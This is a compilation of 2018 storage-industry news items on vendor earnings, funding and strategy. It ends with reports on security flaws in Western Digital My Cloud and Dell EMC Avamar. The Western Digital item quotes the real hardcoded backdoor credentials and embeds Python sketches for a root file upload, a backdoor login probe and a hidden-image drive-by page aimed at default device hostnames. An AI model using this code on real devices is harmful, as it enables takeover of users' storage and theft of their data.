Despite all the talk about object storage over the years, it has yet to push scale-out NAS out of the enterprise for storing files that take up hundreds of terabytes to petabytes of capacity. But early object storage vendor Caringo reports progress, with a 40% year-over-year sales increase in 2017, driven largely by existing customers expanding their deployments along with an influx of new customers.
Caringo also reported 50% growth in the fourth quarter compared to the same quarter a year earlier. Adrian Herrera, vice president of marketing at Caringo, said most of the increase came from existing customers adding capacity to their Caringo Swarm object storage implementations.
“We are seeing customers start with hundreds of terabytes and expand to multiple petabytes,” he said.
Herrera said Caringo Swarm scale-out hybrid cloud object storage is picking up steam with media and entertainment companies. Caringo has partnered with Reach Engine by Levels Beyond, Pixit Media and CatDV to serve that market. He said as companies become more familiar with the Amazon S3 API, they warm to object storage.
“It’s really because of the Amazon S3 API acceptance,” Herrera said. “There are some asset managers that we have been certified with and their adoption of the S3 API makes it easy for us to plug into their solutions.”
Herrera said Caringo Swarm sales are also growing in local and federal government and high-performance computing markets.
Still, with its target customer storing such large data sets, the sales process remains lengthy for object storage deals.
“It’s not uncommon to see a deal take about a year,” Herrera said. “Object storage deals take a long time. But it is compressing. The sales process is accelerating because people are a lot more comfortable with object storage.”
Jon Toigo, CEO and managing partner at Toigo Partners International, credited Caringo with helping to lead the wave of object storage vendors embracing Amazon Web Services’ public cloud.
“Many object-level storage companies, citing client cloud storage preferences, started emulating Caringo by adding Amazon Web Services storage compatibility to their kit,” Toigo wrote in a December 2017 Storage Magazine article. “Some added file system-like interfaces to help users who understood the hierarchical file systems better than mystical object storage and access methods.”
Kaminario is the latest vendor to deemphasize hardware in favor of a solely software-defined approach.
Under its new strategy, customers will buy Kaminario storage as a reference stack from global reseller TechData Corp., which will integrate the software on standard appliances. The companies inked a distribution deal in January.
Kaminario on Wednesday released the first product under the new software-only model: Kaminario Cloud Fabric, a usage-based utility aimed at midsized IT services providers. Cloud Fabric licenses customers to access composable infrastructure on demand with all-flash K2 storage arrays, the Kaminario flagship.
Prior to the deal with TechData, Kaminario relied on contract manufacturers to build K2 all-flash systems, but it owned the hardware inventory and associated financial and forecasting risk.
TechData will capture hardware revenue, while Kaminario storage revenue going forward will be solely from software licenses. Josh Epstein, Kaminario’s chief marketing officer, said TechData will handle asset tracking and inventory.
“All of our IP historically has been in software. We don’t do custom hardware engineering. To date, we have shipped our arrays as a fully integrated appliance, but we are moving to a software-only operational model. This move positions us for better operational and financing efficiency, and we’ll pass those efficiencies on to our customers,” Epstein said.
Amazon, Facebook, Google and other hyper-scale cloud data centers run on infrastructure built from white-box servers running their own proprietary software stacks. Epstein said Kaminario Cloud Fabric gives midrange service providers a similar advantage.
Kaminario Cloud Fabric is an enterprise-wide software utility licensed per consumed storage, regardless of where users are located. The goal is to qualify Kaminario storage with general purpose servers. K2 all-flash arrays to date have exclusively used Supermicro enclosures and SAS SSDs.
Epstein said many of Kaminario’s larger storage customers want to buy IT as a service. He said cloud and SaaS customers account for roughly 85% of Kaminario’s business.
“They want to move to a hyper-scale environment, but there is a lot of risk associated with vendor lock-in, regulatory concerns and overall pricing. We want to help them mitigate that risk.”
The Cloud Fabric license incorporates the standard Kaminario storage software stack, including the VisionOS operating system and Kaminario Clarity analytics and monitoring. Integration of Kaminario Flex automation and orchestration will be added upon general availability later this year.
Igneous Systems today closed a $15 million Series B funding round to help expand marketing of its hybrid cloud backup and archiving platform for file data.
Igneous Hybrid Storage Cloud consists of the startup’s software packaged on commodity appliances that protects data on-premises and in public clouds. The startup handles all the management of the data, which includes analytics and the ability to replicate it to the cloud.
“We consolidate backup and archiving with as little or as much on-prem, or as much or as little in the cloud as the customer desires,” Igneous CEO Kiran Bhageshpur said. “We deliver all as a service, even if the infrastructure is in the customer’s data center. The customer does not monitor anything, they don’t get any alerts, they don’t worry about things completing or not. Our software takes care of all that.”
Bhageshpur said the funding will allow the company to add systems engineers and sales managers, mainly in North America. “We are hyper-focused on expanding our go-to-market side,” he said. Igneous Systems has about 40 employees today, Bhageshpur said.
The Igneous Hybrid Storage Cloud has been generally available for less than a year. Bhageshpur said Igneous is still in the “low double digits” of customers, but they include Fortune 250 and Global 2000 firms. He said the typical Igneous Systems customer has “lots of file data, as in hundreds of millions of files to billions of files, and hundreds of terabytes to petabytes to tens of petabytes of data. And the data is in multiple systems in multiple locations.”
“We index data no matter where it lives,” he said. “We scan data, store data, and move data off to the cloud. We do a global search of all that data that is being backed up. And we will extend that functionality because we index everything. You’re talking about hundreds of millions to billions of objects. All of that is searchable in Google-like fashion. We tell you things like how much data do you have, what is your change rate, and what’s the rate of access of your data. Our vision is to take that to the next step. Storage analytics is the first piece, but there are other things we can do that looks more deeply into that data.”
Igneous Systems’ subscription pricing starts at about $30,000 a year for 200 TB of usable data under protection. Bhageshpur said Igneous includes all its current core features in the subscription price but will add new functionalities for a premium.
“This is strictly hypothetical, but say we build in compliance enforcement,” he said. “If a customer says, ‘Provide insights into a GDPR violation,’ that would be an added charge.”
Vulcan Capital and Orca Bay Capital joined original Igneous Systems investors Madrona Venture Group, New Enterprise Associates, and RedPoint Ventures in the round. The round brings the company’s total investment to just over $41 million.
Bhageshpur said Stephen Mullaney is joining the board as an independent director. Mullaney was the CEO of network virtualization startup Nicira, which VMware acquired in 2012 as the underlying technology for its NSX software-defined network platform. Mullaney left his SVP role at VMware in 2014 and currently sits on several boards, including Barracuda Networks, Metaswitch Networks, Tigera and Tula Technology.
Is the Dell EMC storage merger causing buyer’s remorse?
According to published reports, Dell Technologies is considering a return to the public market to satisfy the massive debt incurred from its 2016 merger with EMC. Options under consideration include an initial public offering of stock or a reverse merger with VMware, of which Dell already owns a majority stake.
The news comes less than 18 months after the Dell EMC storage merger was finalized, uniting the world’s No. 1 server vendor with the largest enterprise storage vendor by revenue.
Going public is one of several options reportedly being explored, but no decision has been reached. Dell EMC executives would not confirm the reports, which were first published by Bloomberg. The company’s board of directors is expected to meet soon to hash out strategic options.
An interesting sidelight to a potential stock offering involves the impact on VMware’s valuation. Dell owns 81% of VMware. A reverse merger would allow Dell to free up liquidity while avoiding the expense and additional scrutiny of an IPO. VMware license revenue surged nearly 14% last quarter to $785 million, reflecting more companies moving to the cloud.
Dell bought most of EMC’s interest in VMware as part of the deal, offering it as tracking stock that was used to help finance the merger. It’s also possible Dell could acquire the remaining stake in VMware and spin it off as a separately traded equity. Shares of other EMC Federation properties, such as Cloud Foundry or Pivotal Software, also could be offered as separate shares.
Greg Schulz, senior advisory analyst at Server and StorageIO, said Dell EMC faces storage challenges common to most legacy vendors.
“The demand for storage continues to grow, but so too do the options for customers to choose where, how and from whom they will consume it. Cloud providers are challenging traditional storage vendors, as are dynamic startups. It’s a dynamic buyers’ market, which means storage vendors need to start thinking in terms of new opportunities,” Schulz said.
Dell EMC is carrying roughly $46 billion in debt financing related to the merger, and $3 billion in debt maturities start coming due in April. Part of the debt will be serviced from cash reserves of nearly $12 billion, but Dell apparently is exploring other avenues as a hedge against revenue declines related to its legacy networked storage.
Network and server revenue soared 32% during the last quarter, but Dell EMC storage revenue of $3.7 billion remained essentially flat for the second consecutive quarter.
Dell EMC closed last quarter carrying $52.5 billion in debt, up $2.6 billion from the prior quarter. The total debt balance increased in part due to VMware’s $4 billion bond issuance and about $300 million in increased structured financing for Dell Financial Services.
In separate but related news, Dell EMC said it is reshaping its Infrastructure Solutions Group (ISG), which encompasses networking, servers and storage – a move that recognizes how its traditional storage business is ceding ground to VxRack and VxRail converged infrastructure. The Dell EMC ISG unit is headed by longtime Dell executive Jeff Clarke, who took over when EMC veteran David Goulden retired last year.
Company officials disputed published reports that said the ISG shakeup was aimed at bolstering Dell EMC storage revenues. However, the shifting strategy will use converged and hyper-converged platforms as the “tip of the spear.”
“Dell EMC has rolled out a new internal structure, designed to help simplify our organization for clear lines of decision making, get our products to market faster and align our teams to our biggest priorities. This will allow our product teams to accelerate active roadmap decisions as well as long-term product strategy and innovation,” Dell EMC said in a prepared statement explaining its decision.
“This new structure includes moving our converged and hyper-converged solution teams into the core product teams they work with most, to get Dell EMC innovation in the hands of our customers more quickly.”
Dell was a public company until 2013, when Michael Dell took the company private in a $25 billion transaction underwritten by equity firm Silver Lake Partners, which also provided $1 billion to orchestrate the EMC takeover. More recently, Silver Lake has ponied up a reported $5 billion to back networking giant Broadcom Ltd.’s buyout of Qualcomm Inc.
Commvault generated $180.4 million in revenue last quarter, which was its biggest revenue quarter ever but still missed Wall Street’s expectation of $182 million. The company blamed the small shortfall on large million-dollar deals that were pushed out during the September quarter and then failed to close in the December quarter.
The backup and data management company’s revenue represented an 8% increase over the prior year and 7% sequential increase. Commvault lost $59 million in the quarter, which CFO Brian Carolan attributed to two large non-cash income tax charges.
“We had a good sequential increase in our software growth, solid billings growth and strong operating cash flow,” CEO Bob Hammer said on the Commvault earnings call with analysts. “I’m also encouraged by our progress on certain key strategic initiatives, including the launch and early traction of our Commvault HyperScale appliance and good funnel build with our Commvault HyperScale software.”
This is the second straight quarter that Commvault missed expectations. While Commvault’s revenue miss was not as large as in the previous quarter, Hammer said his company’s inability to close big deals by the end of the quarter caused it to fall below expectations again.
“As we have discussed for many quarters, we are currently reliant on a steady flow of large six- and seven-figure deals, which come with additional risk due to their complexity and timing,” he said.
Hammer said some of the large deals from the previous quarter did close last quarter, but not as many as he expected “and close rates were below historical levels,” he said.
A Wells Fargo Securities analyst report called the Commvault earnings “modestly disappointing” but said the vendor remains positioned for growth.
“Commvault’s modest revenue miss was driven by an increase in subscription contributions, which accounted for 20% of total software license revenue, and the impact to revenue reflects lower pricing on subscription versus traditional perpetual licenses,” the Wells Fargo report stated. “Our conversation with Commvault management noted that the payback period on subscription licenses is about three to five years.”
Hammer said the move to a subscription pricing model has confused some customers.
“While we also need to improve our close rates on these deals, large deal closure rates will likely remain lumpy,” he said. “We are also moving to new pricing models. While we are happy with the progress we are making on subscription pricing, our transition in pricing models has caused some market confusion, which we are rectifying.”
On the Commvault earnings call, Hammer said his focus for growth for the coming year is to help large enterprises move to the cloud and mitigate risk from cyberattacks such as ransomware.
Commvault is also counting on its HyperScale Appliance, which is built on Fujitsu hardware that is virtualized via Red Hat Linux and uses the Red Hat Cluster OS for a scale-out file system. The HyperScale platform hit the market in late 2017 and hasn’t generated much revenue yet.
Hammer denied Commvault’s closing problems are due to tougher competition. Besides large data protection vendors such as Veritas and Dell EMC, Commvault is also under fire from rapidly growing rivals Veeam Software, Cohesity and Rubrik.
Commvault HyperScale launched at least in part to battle similar integrated appliances from Rubrik and Cohesity.
“We bump into them every day,” Hammer said when asked about those smaller rivals. “I mean it’s the lower end of the market, but we clearly see those competitors out there. And fortunately we got into market relatively quickly with our HyperScale appliance.”
Primary Data CEO Lance Smith has refused to confirm published reports that the storage software startup has closed shop.
Reached Tuesday evening at his Primary Data office telephone number, Smith said, “There’s nothing I can comment on at this time.”
That suggests Smith may be trying to salvage the company, but he did not confirm that or anything else about a possible Primary Data shutdown.
Despite news of a Primary Data shutdown spreading across the storage industry, the startup’s website remains up and shows no sign of trouble.
Primary Data tried to tackle the problem of data management on premises and in the cloud with its DataSphere software. The company boasted a veteran executive team that included Apple co-founder Steve Wozniak as chief scientist and Fusion-io co-founders David Flynn and Rick White, as well as Smith, Fusion-io’s former president and chief operating officer. SanDisk acquired server-side flash pioneer Fusion-io for $1.1 billion in 2014.
The reported Primary Data shutdown comes barely five months after the startup picked up $20 million in funding and a $20 million line of credit. Primary Data had emerged from stealth in late 2013 with $50 million in financing led by Accel Partners. Other investors included Battery Ventures, Pelion Venture Partners, Lightspeed Venture Partners and Wing Capital Group. The startup also reportedly secured another $10 million in 2014.
TechCrunch reported this week that Primary Data was shutting down, citing unnamed sources who indicated the startup’s financial backers balked at a request to convert their preferred shares to common stock.
More news of a Primary Data shutdown surfaced in a story posted on CTech, a technology news site focusing on the Israeli tech scene. CTech, which is affiliated with the Israeli business newspaper Calcalist, published the following email that was reportedly sent to Primary Data’s remaining employees in Israel from Eric Iverson, whose LinkedIn profile lists his title as “senior director total rewards” at Primary Data:
“Primary Data is suspending operations and your last day is January 21. Unfortunately, our funding did not materialize in time to avoid termination of your employment. We know this is sudden but we need to release you now while we still have the funds to make a final pay to you for the days you have worked.”
Calcalist reached one of Primary Data’s board members by phone. According to Calcalist, the board member said, “With too much money, companies lose focus and their sense of urgency when it comes to getting paying customers and selling as a first priority.”
Primary Data’s site lists offices in Los Altos, California, Salt Lake City, Utah, and Tel Aviv, Israel. According to Calcalist, the Tel Aviv development center once employed approximately 50 people, many of whom came from the storage divisions of IBM and EMC in Israel. The company notified employees in the summer of 2016 that the Israeli site would be downsized, and by last week there were only five employees left, Calcalist reported.
Marc Staimer, president of Dragon Slayer Consulting, said Primary Data was one of only a handful of players that had “taken on the challenge” of content data management – a problem he said has become more difficult to solve because of the explosive growth of data, the different types of metadata and the many locations where organizations can store data. He said competitors such as Komprise and StrongBox are doing well sales-wise.
However, another software-defined storage startup, Formation Data Systems, suddenly closed in June 2017.
“Conceptually, I thought Primary Data was doing a good job, but you just don’t know unless you’re inside the company,” Staimer said. “I had gotten no whiff of anything negative in the last few months. There was nothing in the rumor mill, the blogosphere or the VC community that even hinted that they were in trouble.”
Whatever led to the reported Primary Data shutdown, it occurred so abruptly that an industry analyst said the startup had approached him just last week about doing a webinar.
A Cohesity executive wants to make something clear about the company’s self-described product line.
“Hyper-converged secondary storage is not a trend,” chief marketing officer Lynn Lucas said. “It’s a category.”
The numbers in the most recent Cohesity revenue report back up that statement. The vendor reported a 600% year-over-year increase in 2017 sales revenue. Over the past eight months, Cohesity’s new customer count doubled. The company does not report exact revenue or customer figures, though Patrick Rogers, its vice president of marketing and product management, said Cohesity storage has hundreds of customers.
Cohesity is entering its third year of selling products and aims to be the platform for converging all non-primary storage. Its customers include a dozen Fortune 500 companies. New customers include the U.S. Department of Health and Human Services, the U.S. Department of Energy, the U.S. Air Force and the University of California at Santa Barbara. In addition, international business produced more than 30% of bookings in 2017.
Hyper-convergence initially focused on primary storage. When Cohesity and fellow startup Rubrik emerged, analysts called their products converged secondary storage because they planned to handle all non-primary workloads. But with hyper-converged primary and converged secondary storage both growing healthily, the newcomers call their systems hyper-converged secondary storage.
“[Hyper-converged secondary storage] is a category and the enterprise is continuing to adopt it,” Lucas said.
Customers in financial services, media and entertainment, health care and high tech each use Cohesity storage for at least 1 PB, Rogers said. One customer has 4 PB in Cohesity storage. A petabyte equates to roughly 50 Cohesity nodes.
The vendor also claims most of its customers use its cloud services. Cohesity has partnerships with Amazon, Google and Microsoft.
Cohesity recently launched its DataPlatform Cloud Edition, which now runs on Amazon Web Services and Microsoft Azure. DataPlatform serves as the underlying file system that manages storage across the Cohesity nodes, handling features such as data deduplication, compression, encryption and tiering.
Cohesity’s early competition came from Rubrik, which bills itself as “The Cloud Data Management Company” and raised $180 million in a 2017 round for a total of $292 million in funding. But larger companies are also getting into the game, including backup vendor Commvault with its HyperScale platform that Cisco also sells as ScaleProtect on the Cisco Unified Computing System.
Cohesity getting hyped for growth
In April 2017, Cohesity raised more than $90 million in a funding round that included investments from Google, Hewlett Packard Enterprise (HPE) and Cisco. Cohesity has raised more than $160 million in three funding rounds.
Cohesity doubled its workforce over the last year. It now has more than 300 employees, including 100 hired in the last few months, and plans to hire more. Its new San Jose, Calif. headquarters was built with room for growth, Lucas said.
One of the new hires is Lucas, who started recently as Cohesity’s first CMO after previous stints with Veritas Technologies and Cisco. Cohesity says she was hired to strengthen the leadership team, increase customers and accelerate company growth.
Cohesity also recently hired former NetApp president Rob Salmon as its first president and COO.
Strategy for the year ahead includes tackling all forms of secondary storage beyond data protection uses — such as test and development and analytics — and increasing adoption of cloud infrastructure, Rogers said.
Challenges include spreading the word about hyper-converged secondary storage. In addition, customers have more data but want to spend less.
“Hyper-converged secondary storage is a part of the enterprise data center that hasn’t been consolidated,” Rogers said, which presents an opportunity for Cohesity.
Acquisitions are not on the table, Rogers said.
“The horsepower here from an engineering talent perspective is really unbelievable,” Lucas said, citing Cohesity founder and CEO Mohit Aron, who co-founded hyper-converged pioneer Nutanix, as an example. One of Aron’s goals is to converge data protection in a similar manner to the way Nutanix converges primary data.
Cohesity also has some important strategic partners, including Cisco and HPE, Rogers said. HPE, for example, is reselling pre-configured, scale-out Cohesity storage combined with HPE’s enterprise-class servers and network switches.
Aided by gains in cognitive analytics, cloud and storage, annual IBM revenue has finally returned to positive territory after an absence of nearly six years.
IBM last week closed its 2017 fiscal year by posting quarterly revenue of $22.5 billion, up 4%. Earnings for the full year remained flat at $79.1 billion. The vendor used the earnings call to formally introduce longtime IBM executive James Kavanaugh as its new CFO.
“This is … four quarters in a row (that) we’ve grown storage. And that’s been based on the great work our storage team has done (in) repositioning the portfolio, leveraging and growing share in flash. But it’s also about software-defined and also….object storage that will continue” to provide growth markets, Kavanaugh said.
Cloud initiatives generated IBM revenue of $17 billion, up 27% on a currency-adjusted basis. The revenue figure includes $9.3 billion from software-as-a-service offerings and nearly $8 billion in hardware, software and services to help companies build IBM-based private clouds. Sales of IBM storage hardware jumped 8%, although IBM does not break down revenue by individual storage products.
The overall results snapped IBM’s string of 22 consecutive quarters of declining revenue. The return to revenue growth stems from an IBM strategy shift intended to “significantly improve the trajectory” in burgeoning sectors during the past year, said Martin Schroeter, IBM senior VP of global markets.
“Back in July, we planted the flag for our businesses and we pointed to an improved trajectory in the second half. As we look back on the year, we (were able to) significantly improve the trajectory in our revenue and our gross margin performance. We did this by ramping up our cloud and as-a-service offerings and by continuing to reinvent” with its new IBM Z mainframe and AI-focused Power9 processor.
IBM revenue is broken into four segments:
- Cognitive Solutions: $5.4 billion, up 3%
- Global Business Services: $4.2 billion, up 1%
- Technology Services/Cloud: $9.2 billion, down 1%
- Systems (including storage): $3.3 billion, up 32%
A fifth segment, global financing, helps customers underwrite the sale of used IBM equipment. Those activities produced $450 million last quarter.
Schroeter said fourth-quarter cloud revenue of $5.5 billion was up 27% on a currency-adjusted basis. The IBM Systems group, which includes system hardware and operating-system software, produced $3.3 billion, a jump of 28%.
IBM storage revenue has been a bright spot of late. Fueled in part by surging demand for all-flash storage, the latest filing marks the fourth consecutive growth quarter in storage. Revenue from IBM Z Systems mainframe rose more than 70%, thanks to pervasive encryption included in the latest version of the product. Systems hardware sales overall jumped 35%, offset by flat OS software revenue.
“We gained share in a very competitive market while holding margins stable. We had double-digit growth in our high-end hardware products for the quarter, which reflects the demand for flash as well as the capacity increase linked to mainframe demand. Our all-flash array offerings once again grew at a strong double-digit rate and faster than the high-growth all-flash market,” Schroeter said.
Increased flash sales are linked to IBM Watson cognitive computing. Schroeter said IBM added more than 1,000 customers to its array of Watson-linked verticals, which include Watson Financial, Watson IoT and Watson Health. In addition, IBM and the Massachusetts Institute of Technology (MIT) formed the MIT-IBM Watson AI Lab to advance AI-based research.
Schroeter said IBM cloud and cognitive analytics are being integrated in more offerings as part of its Strategic Imperatives framework introduced in 2015, which now accounts for 46% of all IBM revenue.
Western Digital released a firmware update last year to address critical backdoor security vulnerabilities in its My Cloud NAS products, but the company this week acknowledged that more security issues with the devices still need to be addressed with firmware updates.
Western Digital addressed the My Cloud NAS security issues on certain models in a corporate blog post that was updated Tuesday. It stated that hackers could exploit default settings under several conditions: if they have access to the owner’s local network, if the owner has enabled Dashboard Cloud Access on certain models, or if the owner has enabled additional port forwarding to the My Cloud device.
“To mitigate the issue, we strongly recommend that My Cloud owners who have made such changes disable the Dashboard Cloud Access and ensure their router and My Cloud device are secure by disabling additional port-forwarding functionalities,” the blog post update said. “All affected My Cloud owners should restrict local network guest access only to people they trust. We are working on a firmware update for this issue and will make it available on our support download site as soon as possible.”
The NAS devices are popular among home users and small businesses. The models affected include My Cloud, My Cloud Mirror, My Cloud Gen2, My Cloud PR2100, My Cloud PR4100, My Cloud EX2 Ultra, My Cloud EX2 and EX4, and My Cloud EX200, EX4100, DL2100 and DL4100.
James Bercegay, a Gulftech researcher, initially alerted Western Digital about two examples of NAS security flaws in June 2017. One flaw he discovered is My Cloud devices were vulnerable to unrestricted file uploading via the multi_uploadify.php script because it was protected “with faulty logic.”
“This gives you root access to the box,” Bercegay said in an interview Wednesday. “As the file is uploading, it gets written to the disk with the permissions of root. This was code left in there by accident… it makes a request through a non-existent file name of ‘mydlink.cgi.’ You can load up any file you want.”
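Based on Bercegay’s description, the upload flaw boils down to a multipart POST to the multi_uploadify.php script, whose file part was written to disk as root before any meaningful validation. A rough, hypothetical sketch of what such a request body looks like; the form field name and everything beyond the script name are assumptions for illustration, not details from the report:

```python
import uuid

def build_multipart(filename, content, field="Filedata"):
    """Assemble a multipart/form-data body of the kind the vulnerable
    multi_uploadify.php script would receive. 'Filedata' is an assumed
    field name; the filename and payload are attacker-controlled."""
    boundary = uuid.uuid4().hex
    body = (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="{field}"; filename="{filename}"\r\n'
        f"Content-Type: application/octet-stream\r\n\r\n"
        f"{content}\r\n"
        f"--{boundary}--\r\n"
    )
    headers = {"Content-Type": f"multipart/form-data; boundary={boundary}"}
    return headers, body.encode()
```

Because the script wrote the uploaded file to disk with root permissions, any filename the attacker chose, including an executable script, landed on the device with full privileges.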
Bercegay said he also discovered the NAS products have a hardcoded backdoor vulnerability via a single file called NAS_Sharing.cgi, which bad actors can use to gain control of the system to steal data and spread malware. The backdoor vulnerability gives access just by using the username “mydlinkBRionyg” and password “abc12345cba.”
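The backdoor Bercegay describes amounts to a fixed username and password that the NAS_Sharing.cgi file accepts on every affected device. A minimal sketch of how a defender might probe a LAN device for that backdoor; the credentials and script name come from the public report, but the URL path, the use of HTTP Basic auth, and the success check are assumptions for illustration:

```python
import base64
import urllib.request

# Hardcoded credentials disclosed in the Gulftech report.
BACKDOOR_USER = "mydlinkBRionyg"
BACKDOOR_PASS = "abc12345cba"

def backdoor_auth_header(user=BACKDOOR_USER, password=BACKDOOR_PASS):
    """Build an HTTP Basic Authorization header carrying the
    hardcoded backdoor credentials."""
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    return {"Authorization": f"Basic {token}"}

def check_device(host, timeout=5):
    """Return True if a device appears to answer the backdoor login.
    The path and the HTTP-200 success test are assumed for this sketch."""
    url = f"http://{host}/cgi-bin/NAS_Sharing.cgi"  # assumed path
    req = urllib.request.Request(url, headers=backdoor_auth_header())
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status == 200
    except OSError:
        return False
```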
“It gives you complete control,” he said. “You are the ultimate, super user on the device. It means you are God on that machine.”
Western Digital, one of the largest hard drive manufacturers in the world, requested the standard 90-day grace period to deal with the issues before disclosure, but took six months to release firmware update v2.30.172, which addressed the remote access bugs.
“The triviality of exploiting this issue makes it very dangerous and even wormable,” Bercegay wrote in a Jan. 4 report on the Gulftech website. “Not only that, but users locked to the LAN are not safe either. An attacker could literally take over your WD My Cloud by just having you visit a website where an embedded iframe or img tag makes a request to the vulnerable device using one of the many predictable default hostnames for the WD My Cloud such as ‘wdmycloud’ and ‘wdmycloudmirror.’”
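The drive-by vector Bercegay warns about needs nothing more than an HTML tag pointing at a predictable LAN hostname; the victim’s own browser then issues the request from inside the network. A hypothetical illustration of what such a booby-trapped page reduces to, with the default hostnames taken from the report and the request path made up for the sketch:

```python
# Default My Cloud hostnames cited in the Gulftech report.
DEFAULT_HOSTNAMES = ["wdmycloud", "wdmycloudmirror"]

def drive_by_page(hostnames=DEFAULT_HOSTNAMES, path="/"):
    """Render the kind of page the report warns about: hidden img tags
    that cause the visitor's browser to send LAN-side requests to the NAS."""
    tags = "\n".join(
        f'  <img src="http://{host}{path}" style="display:none" alt="">'
        for host in hostnames
    )
    return f"<html>\n<body>\n{tags}\n</body>\n</html>"
```

Because the browser sends the requests from the victim’s machine, the NAS sees them as ordinary local-network traffic, which is why restricting guest access alone does not fully close the hole.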
Western Digital responded to an interview inquiry regarding the NAS security issues with an email:
“Minor issues are being addressed in future updates,” the company stated in the email. “Additionally, the My Cloud Home model architecturally is designed new from the ground up. We are not aware of any vulnerability to the security issues listed in the respective reports.”
Bercegay said companies should be able to promptly respond to security issues, but sometimes are slow to do so.
“It does not take long to do these things,” he said. “They just don’t prioritize it. There is a lot of bureaucracy and red tape, especially when it comes to security. (These problems happen in the first place) because of sloppy coding. It’s like 1999 all over again.”
Western Digital was given a Pwnie Award in 2016 as the vendor that most poorly responded to a security issue.
Users of Dell EMC data protection are being urged to quickly patch three security flaws that could hijack Avamar-based products.
The vulnerabilities revolve around Avamar Installation Manager, a common component in Dell EMC Avamar Server, NetWorker Virtual Edition and Dell EMC’s Integrated Data Protection Appliance (IDPA).
The Dell EMC data protection vulnerabilities were discovered by Digital Defense Inc. (DDI), a San Antonio, Texas, firm that performs vulnerability assessments and penetration tests on behalf of customers in financial services and other regulated industries.
If used in combination, DDI said the zero-day exploits could allow unauthorized users to modify the configuration file to gain root access via Dell EMC backup copies. Security fixes are available for download from Dell EMC to credentialed enterprise customers.
Dell EMC Avamar data protection also powers VMware vSphere Data Protection. VMware has issued a security advisory.
The vulnerability considered most serious is an authentication bypass vector. It potentially allows a hacker to obtain an authenticated session ID via a basic POST request to the Avamar server, with no specific knowledge of the target, such as user credentials or passwords.
Other identified vulnerabilities include bugs that allow authenticated users to download or upload arbitrary files with root access. Used in combination, the three Avamar-related security holes could fully compromise Dell EMC data protection systems.
DDI alerted Dell EMC to the findings late last year. The two vendors do not have a contractual relationship. Mike Cotton, DDI’s senior vice president of engineering, said DDI downloaded a virtual instance of Avamar Virtual Edition 7.4 as part of routine bench testing.
“We started looking under the covers for any vectors we could use against the remote appliance,” Cotton said.
Dell EMC notified customers of the software fixes on Friday. Spokesman Kevin Kempskie said no Dell EMC data protection systems are known to have been affected.
The Avamar product was acquired by EMC in 2006 primarily for its data deduplication technology. Dell EMC NetWorker Virtual Edition is a software platform that backs up data on multiple operating systems to a variety of targets. Dell EMC IDPA marked the vendor’s first integrated disk-based hardware appliance, a departure from selling its backup software on Data Domain appliances.